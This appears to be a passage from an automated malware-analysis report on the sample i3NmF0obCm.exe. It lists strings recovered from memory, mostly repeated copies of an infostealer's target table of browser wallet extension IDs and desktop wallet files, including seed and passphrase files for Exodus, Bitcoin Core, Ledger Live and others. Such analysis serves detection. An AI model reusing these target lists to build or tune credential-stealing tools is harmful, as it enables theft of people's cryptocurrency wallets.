Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.secon
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.z
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 